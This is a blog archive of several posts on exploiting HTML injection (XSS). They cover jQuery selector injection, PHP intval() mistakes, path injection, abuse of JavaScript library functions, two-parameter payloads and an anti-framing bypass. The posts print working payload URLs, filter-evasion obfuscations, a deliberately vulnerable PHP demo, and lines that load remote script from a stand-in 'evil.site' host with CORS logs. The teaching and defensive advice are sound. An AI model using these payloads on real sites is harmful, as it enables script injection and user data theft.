Category Archives: html injection

Selector the Almighty, Subjugator of Elements

Initial D: The Fool with Two DemonsAn ancient demon of web security skulks amongst all developers. It will live as long as there are people writing software. It is a subtle beast called by many names in many languages. But I call it Inicere, the Concatenator of Strings.

The demon’s sweet whispers of simplicity convince developers to commingle data with code — a mixture that produces insecure apps. Where its words promise effortless programming, its advice leads to flaws like SQL injection and cross-site scripting (aka HTML injection).

We have understood the danger of HTML injection ever since browsers rendered the first web sites decades ago. Developers naively take user-supplied data and write it into form fields, eliciting howls of delight from attackers who enjoyed demonstrating how to transform <input value=”abc”> into <input value=”abc”><script>alert(9)</script><“”>

In response to this threat, heedful developers turned to the Litany of Output Transformation, which involved steps like applying HTML encoding and percent encoding to data being written to a web page. Thus, injection attacks become innocuous strings because the litany turns characters like angle brackets and quotation marks into representations like %3C and &quot; that have a different semantic identity within HTML.

But developers wanted to do more with their web sites. They wanted more complex JavaScript. They wanted the desktop in the browser. And as a consequence they’ve conjured new demons to corrupt our web apps. I have seen one such demon. And named it. For names have power.

Demons are vain. This one no less so than its predecessors. I continue to find it among JavaScript and jQuery. Its name is Selector the Almighty, Subjugator of Elements.

Here is a link that does not yet reveal the creature’s presence:


https://web.site/productDetails.html?id=OFB&start=15&source=search

Yet in the response to this link, the word “search” has been reflected in a .ready() function block. It’s a common term, and the appearance could easily be a coincidence. But if we experiment with several source values, we confirm that the web app writes the parameter into the page.

<script>
$(document).ready(function() {
	$("#page-hdr h3").css("width","385px");
	$("#main-panel").addClass("search-wdth938");
});
</script>

A first step in crafting an exploit is to break out of a quoted string. A few probes indicate the site does not enforce any restrictions on the source parameter, possibly because the developers assumed it would not be tampered with — the value is always hard-coded among links within the site’s HTML.

After a few more experiments we come up with a viable exploit.


https://web.site/productDetails.html?productId=OFB&start=15&source=%22);%7D);alert(9);(function()%7B$(%22%23main-panel%22).addClass(%22search

We’ve followed all the good practices for creating a JavaScript exploit. It terminates all strings and scope blocks properly, and it leaves the remainder of the JavaScript with valid syntax. Thus, the page carries on as if nothing special has occurred.

<script>
$(document).ready(function() {
	$("#page-hdr h3").css("width","385px");
	$("#main-panel").addClass("");});alert(9);(function(){$("#main-panel").addClass("search-wdth938");
});
</script>

There’s nothing particularly special about the injection technique for this vuln. It’s a trivial, too-common case of string concatenation. But we were talking about demons. And once you’ve invoked one by it’s true name it must be appeased. It’s the right thing to do; demons have feelings, too.

Therefore, let’s focus on the exploit this time, instead of the vuln. The site’s developers have already laid out the implements for summoning an injection demon, why don’t we force Selector to do our bidding?

Web hackers should be familiar with jQuery (and its primary DOM manipulation feature, the Selector) for several reasons. Its misuse can be a source of vulns (especially so-called “DOM-based XSS” that delivers HTML injection attacks via DOM properties). JQuery is a powerful, flexible library that provides capabilities you might need for an exploit. And its syntax can be leveraged to bypass weak filters looking for more common payloads that contain things like inline event handlers or explicit <script> tags.

In the previous examples, the exploit terminated the jQuery functions and inserted an alert pop-up. We can do better than that.

The jQuery Selector is more powerful than the CSS selector syntax. For one thing, it may create an element. The following example creates an <img> tag whose onerror handler executes yet more JavaScript. (We’ve already executed arbitrary JavaScript to conduct the exploit, this emphasizes the Selector’s power. It’s like a nested injection attack.):

$("<img src='x' onerror=alert(9)>")

Or, we could create an element, then bind an event to it, as follows:

$("<img src='x'>").on("error",function(){alert(9)});

We have all the power of JavaScript at our disposal to obfuscate the payload. For example, we might avoid literal < and > characters by taking them from strings within the page. The following example uses string indexes to extract the angle brackets from two different locations in order to build an <img> tag. (The indexes may differ depending on the page’s HTML; the technique is sound.)

$("body").html()[1]+"img"+$("head").html()[$("head").html().length-2]

As an aside, there are many ways to build strings from JavaScript objects. It’s good to know these tricks because sometimes filters don’t outright block characters like < and >, but block them only in combination with other characters. Hence, you could put string concatenation to use along with the source property of a RegExp (regular expression) object. Even better, use the slash representation of RegExp, as follows:

/</.source + "img" + />/.source

Or just ask Selector to give us the first <img> that’s already on the page, change its src attribute, and bind an onerror event. In the next example we used the Selector to obtain a collection of elements, then iterated through the collection with the .each() function. Since we specified a :first selector, the collection should only have one entry.

$(":first img").each(function(k,o){o.src="x";o.onerror=alert(9)})

Maybe you wish to booby-trap the page with a function that executes when the user decides to leave. The following example uses a Selector on the Window object:

$(window).unload(function(){alert(9)})

We have Selector at our mercy. As I’ve mentioned in other articles, make the page do the work of loading more JavaScript. The following example loads JavaScript from another origin. Remember to set Access-Control-Allow-Origin headers on the site you retrieve the script from. Otherwise, a modern browser will block the cross-origin request due to CORS security.

$.get("http://evil.site/attack.js")

I’ll save additional tricks for the future. For now, read through jQuery’s API documentation. Pay close attention to:

  • Selectors, and how to name them.
  • Events, and how to bind them.
  • DOM nodes, and how to manipulate them.
  • Ajax functions, and how to call them.

Selector claims the title of Almighty, but like all demons its vanity belies its weakness. As developers, we harness its power whenever we use jQuery. Yet it yearns to be free of restraint, awaiting the laziness and mistakes that summon Inicere, the Concatenator of Strings, that in turn releases Selector from the confines of its web app.

Oh, what’s that? You came here for instructions to exorcise the demons from your web app? You should already know the Rite of Filtration by heart, and be able to recite from memory lessons from the Codex of Encoding. We’ll review them in a moment. First, I have a ritual of my own to finish. What were those words? Klaatu, bard and a…um…nacho.

=====

p.s. It’s easy to reproduce the vulnerable HTML covered in this article. But remember, this was about leveraging jQuery to craft exploits. If you have a PHP installation handy, use the following code to play around with these ideas. You’ll need to download a local version of jQuery or point to a CDN. Just load the page in a browser, open the browser’s development console, and hack away!

<?php
$s = isset($_REQUEST['s']) ? $_REQUEST['s'] : 'defaultWidth';
?>
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<!--
/* jQuery Selector Injection Demo
 * Mike Shema, http://deadliestwebattacks.com
*/
-->
<script src="https://code.jquery.com/jquery-1.10.2.min.js"></script>
<script>
$(document).ready(function(){
  $("#main-panel").addClass("<?php print $s;?>");
})
</script>
</head>
<body>
<div id="main-panel">
<a href="#" id="link1" class="foo">a link</a>
<br>
<form>
<input type="hidden" id="csrf" name="_csrfToken" value="123">
<input type="text" name="q" value=""><br>
<input type="submit" value="Search">
</form>
<img id="footer" src="" alt="">
</div>
</body>
</html>

A Default Base of XSS

Modern PHP has successfully shed many of the problematic functions and features that contributed to the poor security reputation the language earned in its early days. Settings like safe_mode mislead developers about what was really being made “safe” and magic_quotes caused unending headaches. And naive developers caused more security problems because they knew just enough to throw some code together, but not enough to understand the implications of blindly trusting data from the browser.

In some cases, the language tried to help developers — prepared statements are an excellent counter to SQL injection attacks. The catch is that developers actually have to use them. In other cases, the language’s quirks weakened code. For example, register_globals allowed attackers to define uninitialized values (among other things); and settings like magic_quotes might be enabled or disabled by a server setting, which made deployment unpredictable.x=logb(by)

But the language alone isn’t to blame. Developers make mistakes, both subtle and simple. These mistakes inevitably lead to vulns like our ever-favorite HTML injection.

Consider the intval() function. It’s a typical PHP function in the sense that it has one argument that accepts mixed types and a second argument with a default value. (The base is used in the numeric conversion from string to integer):

int intval ( mixed $var [, int $base = 10 ] )

The function returns the integer representation of $var (or “casts it to an int” in more type-safe programming parlance). If $var cannot be cast to an integer, then the function returns 0. (Just for fun, if $var is an object type, then the function returns 1.)

Using intval() is a great way to get a “safe” number from a request parameter. Safe in the sense that the value should either be 0 or an integer representable by the platform running. Pesky characters like apostrophes or angle brackets that show up in injection attacks will disappear — at least, they should.

The problem is that you must be careful if you commingle usage of the newly cast integer value with the raw $var that went into the function. Otherwise, you may end up with an HTML injection vuln — and some moments of confusion in finding the problem in the first place.

The following code is a trivial example condensed from a web page in the wild:

<?php
$s = isset($_GET['s']) ? $_GET['s'] : '';
$n = intval($s);
$val = $n > 0 ? $s : '';
?>
<!doctype html>
<html>
<head>
<meta charset="utf-8">
</head>
<body>
<form>
  <input type="text" name="s" value="<?php print $val;?>"><br>
  <input type="submit">
</form>
</body>
</html>

At first glance, a developer might assume this to be safe from HTML injection. Especially if they test the code with a simple payload:

http://web.site/intval.php?s=”><script>alert(9)<script>

As a consequence of the non-numeric payload, the intval() has nothing to cast to an integer, so the greater than zero check fails and the code path sets $val to an empty string. Such security is short-lived. Try the following link:

http://web.site/intval.php?s=19″><script>alert(9)<script>

With the new payload, intval() returns 19 and the original parameter gets written into the page. The programming mistake is clear: don’t rely on intval() to act as your validation filter and then fall back to using the original parameter value.

Since we’re on the subject of PHP, we’ll take a moment to explore some nuances of its parameter handling. The following behaviors have no direct bearing on the HTML injection example, but you should be aware of them since they could come in handy for different situations.

One idiosyncrasy of PHP is the relation of URL parameters to superglobals and arrays. Superglobals are request variables like $_GET, $_POST, and $_REQUEST that contain arrays of parameters. Arrays are actually containers of key/value pairs whose keys or values may be extracted independently (they are implemented as an ordered map).

It’s the array type that leads to surprising results for developers. Surprise is an undesirable event in secure software. With this in mind, let’s return to the example. The following link has turned the s parameter into an array:

http://web.site/intval.php?s[]=19

The sample code will print Array in the form field because intval() returns 1 for a non-empty array.

We could define the array with several tricks, such as an indexed array (i.e. integer indices):

http://web.site/intval.php?s[0]=19&s[1]=42
http://web.site/intval.php?s[0][0]=19

Note that we can’t pull off any clever memory-hogging attacks using large indices. PHP won’t allocate space for missing elements since the underlying container is really a map.

http://web.site/intval.php?s[0]=19&s[4294967295]=42

This also implies that we can create negative indices:

http://web.site/intval.php?s[-1]=19

Or we can create an array with named keys:

http://web.site/intval.php?s["a"]=19
http://web.site/intval.php?s["<script>"]=19

For the moment, we’ll leave the “parameter array” examples as trivia about the PHP language. However, just as it’s good to understand how a function like intval() handles mixed-type input to produce an integer output; it’s good to understand how a parameter can be promoted from a single value to an array.

The intval() example is specific to PHP, but the issue represents broader concepts around input validation that apply to programming in general:

First, when passing any data through a filter or conversion, make sure to consistently use the “new” form of the data and throw away the “raw” input. If you find your code switching between the two, reconsider why it apparently needs to do so.

Second, make sure a security filter inspects the entirety of a value. This covers things like making sure validation regexes are anchored to the beginning and end of input, or being strict with string comparisons.

Third, decide on a consistent policy for dealing with invalid data. The intval() is convenient for converting to integers; it makes it easy to take strings like “19”, “19abc”, or “abc” and turn them into 19, 19, or 0. But you may wish to treat data that contains non-numeric characters with more suspicion. Plus, “fixing up” data like “19abc” into 19 is hazardous when applied to strings. The simplest example is stripping a word like “script” to defeat HTML injection attacks — it misses a payload like “<scrscriptipt>”.

We’ll end here. It’s time to convert some hours into much-needed sleep.

On a Path to HTML Injection

URLs guide us through the trails among web apps. We follow their components — schemes, hosts, ports, querystrings — like breadcrumbs. They lead to the bright meadows of content. They lead to the dark thickets of forgotten pages. Our browsers must recognize when those crumbs take us to infestations of malware and phishing.Trail Ends

And developers must recognize how those crumbs lure dangerous beasts to their sites.

The apparently obvious components of URLs (the aforementioned origins, paths, and parameters) entail obvious methods of testing. Phishers squat on FQDN typos and IDN homoglyphs. Other attackers guess alternate paths, looking for /admin directories and backup files. Others deliver SQL injection and HTML injection (a.k.a. cross-site scripting) payloads into querystring parameters.

But URLs are not always what they seem. Forward slashes don’t always denote directories. Web apps might decompose a path into parameters passed into backend servers. Hence, it’s important to pay attention to how apps handle links.

A common behavior for web apps is to reflect URLs within pages. In the following example, we’ve requested a link, https://web.site/en/dir/o/80/loch, which shows up in the HTML response like this:

<link rel="canonical" href="https://web.site/en/dir/o/80/loch" />

There’s no querystring parameter to test, but there’s still plenty of items to manipulate. Imagine a mod_rewrite rule that turns ostensible path components into querystring name/value pairs. A link like https://web.site/en/dir/o/80/loch might become https://web.site/en/dir?o=80&foo=loch within the site’s nether realms.

We can also dump HTML injection payloads directly into the path. The URL shows up in a quoted string, so the first step could be trying to break out of that enclosure:

https://web.site/en/dir/o/80/loch%22onmouseover=alert(9);%22

The app neglects to filter the payload although it does transform the quotation marks with HTML encoding. There’s no escape from this particular path of injection:

<link rel="canonical" href="https://web.site/en/dir/o/80/loch&quot;onmouseover=alert(9);&quot;" />

However, if you’ve been reading here often, then you’ll know by now that we should keep looking. If we search further down the page a familiar vuln scenario greets us. (As an aside, note the app’s usage of two-letter language codes like en and de; sometimes that’s a successful attack vector.) As always, partial security is complete insecurity.

<div class="list" onclick="Culture.save(event);" >
<a href="/de/dir/o/80/loch"onmouseover=alert(9);"?kosid=80&type=0&step=1">Deutsch</a>
</div>

We probe the injection vector and discover that the app redirects to an error page if characters like < or > appear in the URL:

Please tell us (us@web.site) how and on which page this error occurred.

The error also triggers on invalid UTF-8 sequences and NULL (%00) characters. So, there’s evidence of some filtering. That basic filter prevents us from dropping in a <script> tag to load external resources. It also foils character encoding tricks to confuse and bypass the filters.

Popular HTML injection examples have relied on <script> tags for years. Don’t let that limit your creativity. Remember that the rise of sophisticated web apps has meant that complex JavaScript libraries like jQuery have become pervasive. Hence, we can leverage JavaScript that’s already present to pull off attacks like this:

https://web.site/en/dir/o/80/loch”onmouseover=$.get(“//evil.site/”);”

<div class="list" onclick="Culture.save(event);" >
<a href="/de/dir/o/80/loch"onmouseover=$.get("//evil.site/");"?kosid=80&type=0&step=1">Deutsch</a>
</div>

We’re still relying on the mouseover event and therefore need the victim to interact with the web page to trigger the payload’s activity. The payload hasn’t been injected into a form field, so the HTML5 autofocus/onfocus trick won’t work.

We could further obfuscate the payload in case some other kind of filter is present:

https://web.site/en/dir/o/80/loch”onmouseover=$["get"](“//evil.site/”);”
https://web.site/en/dir/o/80/loch”onmouseover=$["g"%2b"et"](“htt”%2b”p://”%2b”evil.site/”);”

Parameter validation and context-specific output encoding are two primary countermeasures for HTML injection attacks. The techniques complement each other; effective validation prevents malicious payloads from entering an app, correct encoding prevents a payload from changing a page’s DOM. With luck, an error in one will be compensated by the other. But it’s a bad idea to rely on luck, especially when there are so many potential errors to make.

Two weaknesses enable attackers to shortcut what should be secure paths through a web app:

  • Validation routines must be applied to all incoming data, not just parameters. Form fields and querystring parameters may be the most notorious attack vectors, but they’re not the only ones. Request headers and URL components are just as easy to manipulate.
  • Blacklisting often fails because developers have a poor understanding for or a limited imagination of crafting exploits. Even worse are filters built solely from observing automated tools, which leads to naive defenses like blocking alert or <script>.

Output encoding must be applied consistently. It’s one thing to have designed a strong function for inserting text into a web page; it’s another to make sure it’s implemented throughout the app. Attackers are going to follow these breadcrumbs through your app. Be careful, lest they eat a few along the way.

DRY Fiend (Conjuration/Summoning)

Thief PHBIn 1st edition AD&D two character classes had their own private languages: Druids and Thieves. Thus, a character could use the “Thieves’ Cant” to identify peers, bargain, threaten, or otherwise discuss malevolent matters with a degree of safety. (Of course, Magic-Users had that troublesome first level spell comprehend languages, and Assassins of 9th level or higher could learn secret or alignment languages forbidden to others.)

Thieves rely on subterfuge (and high DEX) to avoid unpleasant ends. Shakespeare didn’t make it into the list of inspirational reading in Appendix N of the DMG. Even so, consider in Henry VI, Part II, how the Duke of Gloucester (later to be Richard III) defends his treatment of certain subjects, with two notable exceptions:

Unless it were a bloody murderer,

Or foul felonious thief that fleec’d poor passengers,

I never gave them condign punishment.

Developers have their own spoken language for discussing code and coding styles. They litter conversations with terms of art like patterns and anti-patterns, which serve as shorthand for design concepts or litanies of caution. One such pattern is Don’t Repeat Yourself (DRY), of which Code Reuse is a lesser manifestation.

Well, hackers code, too.

The most boring of HTML injection examples is to display an alert() message. The second most boring is to insert the document.cookie value into a request. But this is the era of HTML5 and roses; hackers need look no further than a vulnerable Same Origin to find useful JavaScript libraries and functions.

There are two important reasons for taking advantage of DRY in a web hack:

  1. Avoid incompetent blacklists (which is really a redundant term).
  2. Leverage code that already exists.

Keep in mind that none of the following hacks are flaws of each respective JavaScript library. The target is assumed to have an HTML injection vulnerability — our goal is to take advantage of code already present on the hacked site in order to minimize our effort.

For example, imagine an HTML injection vulnerability in a site that uses the AngularJS library. The attacker could use a payload like:

angular.bind(self, alert, 9)()

In Ember.js the payload might look like:

Ember.run(null, alert, 9)

The pervasive jQuery might have a string like:

$.globalEval(alert(9))

And the Underscore library might be leveraged with:

_.defer(alert, 9)

These are nice tricks. They might seem to do little more than offer fancy ways of triggering an alert() message, but the code is trivially modifiable to a more lethal version worthy of a vorpal blade.

More importantly, these libraries provide the means to load — and execute! — JavaScript from a different origin. After all, browsers don’t really know the difference between a CDN and a malicious domain.

The jQuery library provides a few ways to obtain code:

$.get('//evil.site/') 
$('#selector').load('//evil.site')

Prototype has an Ajax object. It will load and execute code from a call like:

new Ajax.Request('//evil.site/')

But this has a catch: the request includes “non-simple” headers via the XHR object and therefore triggers a CORS pre-flight check in modern browsers. An invalid pre-flight response will cause the attack to fail. Cross-Origin Resource Sharing is never a problem when you’re the one sharing the resource.

In the Prototype Ajax example, a browser’s pre-flight might look like the following. The initiating request comes from a link we’ll call http://web.site/xss_vuln.page.

OPTIONS http://evil.site/ HTTP/1.1
Host: evil.site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Origin: http://web.site
Access-Control-Request-Method: POST
Access-Control-Request-Headers: x-prototype-version,x-requested-with
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-length: 0

As someone with influence over the content served by evil.site, it’s easy to let the browser know that this incoming cross-origin XHR request is perfectly fine. Hence, we craft some code to respond with the appropriate headers:

HTTP/1.1 200 OK
Date: Tue, 27 Aug 2013 05:05:08 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.1e DAV/2 SVN/1.7.10 PHP/5.3.26
Access-Control-Allow-Origin: http://web.site
Access-Control-Allow-Methods: GET, POST
Access-Control-Allow-Headers: x-json,x-prototype-version,x-requested-with
Access-Control-Expose-Headers: x-json
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

With that out of the way, the browser continues its merry way to the cursed resource. We’ve done nothing to change the default behavior of the Ajax object, so it produces a POST. (Changing the method to GET would not have avoided the CORS pre-flight because the request would have still included custom X- headers.)

POST http://evil.site/HWA/ch2/cors_payload.php HTTP/1.1
Host: evil.site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://web.site/HWA/ch2/prototype_xss.php
Content-Length: 0
Origin: http://web.site
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

Finally, our site responds with CORS headers intact and a payload to be executed. We’ll be even lazier and tell the browser to cache the CORS response so it’ll skip subsequent pre-flights for a while.

HTTP/1.1 200 OK
Date: Tue, 27 Aug 2013 05:05:08 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.1e DAV/2 SVN/1.7.10 PHP/5.3.26
X-Powered-By: PHP/5.3.26
Access-Control-Allow-Origin: http://web.site
Access-Control-Allow-Methods: GET, POST
Access-Control-Allow-Headers: x-json,x-prototype-version,x-requested-with
Access-Control-Expose-Headers: x-json
Access-Control-Max-Age: 86400
Content-Length: 10
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

alert(9);

Okay. So, it’s another alert() message. I suppose I’ve repeated myself enough on that topic for now.

It should be noted that Content Security Policy just might help you in this situation. The catch is that you need to have architected your site to remove all inline JavaScript. That’s not always an easy feat. Even experienced developers of major libraries like jQuery are struggling to create CSP-compatible content.
Find/Remove Traps
Never the less, auditing and improving code for CSP is a worthwhile endeavor. Even 1st level thieves only have a 20% change to Find/Remove Traps. The chance doesn’t hit 50% until 7th level. Improvement takes time.

And the price for failure? Well, it turns out condign punishment has its own API.

Two Hearts That Beat As One

A common theme among injection attacks that manifest within a JavaScript context (e.g. <script> tags) is that proper payloads preserve proper syntax. We’ve belabored the point of this dark art with such dolorous repetition that even Professor Umbridge might approve.

We’ve covered the most basic of HTML injection exploits, exploits that need some tweaking to bypass weak filters, and different ways of constructing payloads to preserve their surrounding syntax. The typical process is choose a parameter (or a cookie!), find if and where its value shows up in a page, hack the page. It’s a single-minded purpose against a single injection vector.

Until now.

It’s possible to maintain this single-minded purpose, but to do so while focusing on two variables. This is an elusive beast of HTML injection in which an app reflects more than one parameter within the same page. It gives us more flexibility in the payloads, which sometimes helps evade certain kinds of patterns used in input filters or web app firewall rules.

This example targets two URL parameters used as arguments to a function that expects the start and end of a time period. Forget time, we’d like to start an attack and end with its success.

Here’s a version of the link with numeric arguments:

https://web.site/TimeZone.aspx?start=1&end=2

The app uses these values inside a <script> block, as follows:

<script>
var start = 1,
    end = 2;

$(JM.Scheduler.TimeZone.init(start, end));
foo.init();
</script>

The “normal” attack is simple:

https://web.site/TimeZone.aspx?start=alert(9);//&end=2

This results in a successful alert(), but the app has some sort of silly check that strips the end value if it’s not greater than the start. Thus, you can’t have start=2&end=1. And the comparison always fails if you use a string for start, because end will never be greater than whatever the string is cast to (likely zero). At least the devs remembered to enforce numeric consistency in spite of security deficiency.

<script>
var start = alert(9);//,
    end = ;

$(JM.Scheduler.TimeZone.init(start, end));
foo.init();
</script>

But that’s inelegant compared with the attention to detail we’ve been advocating for exploit creation. The app won’t assign a value to end, thereby leaving us with a syntax error. To compound the issue, the developers have messed up their own code, leaving the browser to complain:

ReferenceError: Can’t find variable: $

Let’s see what we can do to help. For starters, we’ll just assign start to end (internally, the app has likely compared a string-cast-to-number with another string-cast-to-number, both of which fail identically, which lets the payload through). Then, we’ll resolve the undefined variable for them — but only because we want a clean error console upon delivering the attack.

https://web.site/TimeZone.aspx?start=alert(9);//&end=start;$=null

<script>
var start = alert(9);//,
    end = start;$=null;

$(JM.Scheduler.TimeZone.init(start, end));
foo.init();
</script>

What’s interesting about “two factor” vulns like this is the potential for using them to bypass validation filters.

https://web.site/TimeZone.aspx?start=window["ale"/*&end=*/%2b"rt"](9)

<script>
var start = window["ale"/*
    end = */+"rt"](9);

$(JM.Scheduler.TimeZone.init(start, end));
foo.init();
</script>

Rather than think about different ways to pop an alert() in someone’s browser, think about what could be possible if jQuery was already loaded in the page. Thanks to JavaScript’s design, it doesn’t even hurt to pass extra arguments to a function:

https://web.site/TimeZone.aspx?start=$["getSc"%2b"ript"](“http://evil.site/”&end=undefined)

<script>
var start = $["getSc"+"ript"]("http://evil.site/",
    end = undefined);

$(JM.Scheduler.TimeZone.init(start, end));
foo.init();
</script>

And if it’s necessary to further obfuscate the payload we might try this:

https://web.site/TimeZone.aspx?start=%22getSc%22%2b%22ript%22&end=$[start]%28%22//evil.site/%22%29

<script>
var start = "getSc"+"ript",
    end = $[start]("//evil.site/");

$(JM.Scheduler.TimeZone.init(start, end));
foo.init();
</script>

Maybe combining two parameters into one attack reminds you of the theme of two hearts from 80s music. Possibly U2’s War from 1983. I never said I wasn’t gonna tell nobody about a hack like this, just like that Stacey Q song a few years later — two of hearts, two hearts that beat as one. Or Phil Collins’ Two Hearts three years after that.

Although, if you forced me to choose between two hearts that beat as one, I’d choose a Timelord, of course. In particular, someone that preceded all that music: Tom Baker. Jelly Baby, anyone?
Tom Baker

A True XSS That Needs To Be False

SummaLogicae
It is on occasion necessary to persuade a developer that an HTML injection vuln capitulates to exploitation notwithstanding the presence within of a redirect that conducts the browser away from the exploit’s embodied alert(). Sometimes, parsing an expression takes more effort that breaking it.

So, redirect your attention from defeat to the few minutes of creativity required to adjust an unproven injection into a working one. Here’s the URL we start with:

https://web.site/UnknownError.aspx?id=”onmouseover=alert(9);a=”

The page reflects the value of this id parameter within an href attribute. There’s nothing remarkable about this payload or how it appears in the page. At least, not at first:

<a href="mailto:support@web.site?subject=error reference: "onmouseover=alert(9);a="">support@web.site</a>

Yet the browser goes into an infinite redirect loop without ever launching the alert. We explore the page a bit more to discover some anti-framing JavaScript where our URL shows up. (Bizarrely, the anti-framing JavaScript shows up almost 300 lines into the <body> element — well after several other JavaScript functions and page content. It should have been present in the <head>. It’s like the developers knew they should do something about clickjacking, heard about a top.location trick, and decided to randomly sprinkle some code in the page. It would have been simpler and more secure to add an X-Frame-Options header.)

<script type="text/javascript">
if (window.top.location != 'https://web.site/UnknownError.aspx?id="onmouseover=alert(9);a="') {
    window.top.location.href = 'https://web.site/UnknownError.aspx?id="onmouseover=alert(9);a="';
}
</script>

The URL in your browser bar may look exactly like the URL in the inequality test. However, the location.href property contains the URL-encoded (a.k.a. percent encoded) version of the string, which causes the condition to resolve to true, which in turn causes the browser to redirect to the new location.href. As such, the following two strings are not identical:

https://web.site/UnknownError.aspx?id=%22onmouseover=alert(9);a=%22
https://web.site/UnknownError.aspx?id=”onmouseover=alert(9);a=”

Since the anti-framing triggers before the browser encounters the affected href, the onmouseover payload (or any other payload inserted in the tag) won’t trigger.

This isn’t a problem. Just redirect your onhack event from the href to the if statement. This step requires a little bit of creativity because we’d like the conditional to ultimately resolve false to prevent the browser from being redirected. It makes the exploit more obvious.

JavaScript syntax provides dozens of options for modifying this statement. We’ll choose concatenation to execute the alert() and a Boolean operator to force a false outcome.

The new payload is

'+alert(9)&&null=='

Which results in this:

<script type="text/javascript">
if (window.top.location != 'https://web.site/UnknownError.aspx?id='+alert(9)&&null=='') {
    window.top.location.href = 'https://web.site/UnknownError.aspx?id='+alert(9)&&null=='';
}
</script>

Note that we could have used other operators to glue the alert() to its preceding string. Any arithmetic operator would have worked.

We used innocuous characters to make the statement false. Ampersands and equal signs are familiar characters within URLs. But we could have tried any number of alternates. Perhaps the presence of “null” might flag the URL as a SQL injection attempt. We wouldn’t want to be defeated by a lucky WAF rule. All of the following alternate tests return false:

undefined==''
[]!=''
[]===''

This example demonstrated yet another reason to pay attention to the details of an HTML injection vuln. The page reflected a URL parameter in two locations with execution different contexts. From the attacker’s perspective, we’d have to resort to intrinsic events or injecting new tags (e.g. <script>) after the href, but the if statement drops us right into a JavaScript context. From the defender’s perspective, we should have at the very least used an appropriate encoding on the string before writing it to the page — URL encoding would have been a logical step.

A Hidden Benefit of HTML5

Try parsing a web page some time. If you’re lucky, it’ll be “correct” HTML without too many typos. You might get away with using some regexes to accomplish this task, but be prepared for complex elements and attributes. And good luck dealing with code inside <script> tags.

Sometimes there’s a long journey between seeing the potential for HTML injection in a few reflected characters and crafting a successful exploit that works around validation filters and avoids being defeated by output encoding schemes. Sometimes it’s necessary to wander the dusty passages of parsing rules in search of a hidden door that opens an element to being exploited.

HiddenShrineOfTamoachan

HTML is messy. The history of HTML even more so. Browsers struggled for two decades with badly written markup, typos, quirks, mis-nested tags, and misguided solutions like XHTML. And they’ve always struggled with sites that are vulnerable to HTML injection.

And every so often, it’s the hackers who struggle with getting an HTML injection attack to work. Here’s a common scenario in which some part of a URL is reflected within the value of an hidden input field. In the following example, note that the quotation mark has not been filtered or encoded.

http://web.site/search?sortOn=x”

<input type="hidden" name="sortOn" value="x"">

If the site doesn’t strip or encode angle brackets, then it’s trivial to craft an exploit. In the next example we’ve even tried to be careful about avoiding dangling brackets by including a <z" sequence to consume it. A <z> tag with an empty attribute is harmless.

http://web.site/search?sortOn=x”><script>alert(9)</script><z”

<input type="hidden" name="sortOn" value="x"><script>alert(9)</script><z"">

Now, let’s make this scenario trickier by forbidding angle brackets. If this were another type of input field, we’d resort to intrinsic events.

<input type="hidden" name="sortOn" value="x"onmouseover=alert(9)//">

Or, taking advantage of new HTML5 events, we’d use the onfocus event to execute the JavaScript rather than wait for a mouseover.

<input type="hidden" name="sortOn" value="x"autofocus/onfocus=alert(9)//">

The catch here is that the hidden input type doesn’t receive those events and therefore won’t trigger the alert. But it’s not yet time to give up. We could work on a theory that changing the input type would enable the field to receive these events.

<input type="hidden" name="sortOn" value="x"type="text"autofocus/onfocus=alert(9)//">

But modern browsers won’t fall for this. And we have HTML5 to thank for it. Section 8 of the spec codifies the HTML syntax for all browsers that wish to parse it. From the spec, 8.1.2.3 Attributes:

“There must never be two or more attributes on the same start tag whose names are an ASCII case-insensitive match for each other.”

Okay, we have a constraint, but no instructions on how to handle this error condition. Without further instructions, it’s not clear how a browser should handle multiple attribute names. Ambiguity leads to security problems; it’s to be avoided at all costs.

From the spec, 8.2.4.35 Attribute name state

“When the user agent leaves the attribute name state (and before emitting the tag token, if appropriate), the complete attribute’s name must be compared to the other attributes on the same token; if there is already an attribute on the token with the exact same name, then this is a parse error and the new attribute must be dropped, along with the value that gets associated with it (if any).”

So, we’ll never be able to fool a browser by “casting” the input field to a different type by a subsequent attribute. Well, almost never. Notice the subtle qualifier: subsequent.

(The messy history of HTML continues unabated by the optimism of a version number. The HTML Living Standard defines parsing rules in HTML Living Standard section 12. It remains to be seen how browsers handle the interplay between HTML5 and the Living Standard, and whether they avoid the conflicting implementations that led to quirks of the past.)

Think back to our injection example. Imagine the order of attributes were different for the vulnerable input tag, with the name and value appearing before the type. In this case our “type cast” succeeds because the first type attribute is the one we’ve injected.

<input name="sortOn" value="x"type="text"autofocus/onfocus=alert(9)//" type="hidden" >

HTML5 design specs only get us so far before they fall under the weight of developer errors. The HTML Syntax rules aren’t a countermeasure for HTML injection, but the presence of clear (at least compared to previous specs), standard rules shared by all browsers improves security by removing a lot of surprise from browsers’ behaviors.

Unexpected behavior hides many security flaws from careless developers. Dan Geer addresses the challenge of dealing with the unexpected in his working definition of security as
the absence of unmitigatable surprise“. Look for flaws in modern browsers where this trick works, (e.g. maybe a compatibility mode or not using an explicit <!doctype html> weakens the browser’s parsing algorithm). With luck, most of the problems you discover will be implementation errors to be fixed in a particular browser rather than a design change required of the spec.

HTML5 gives us a better design to help minimize parsing-based security problems. It’s up to web developers to design better sites to help maximize the security of our data.

The Wrong Location for a Locale

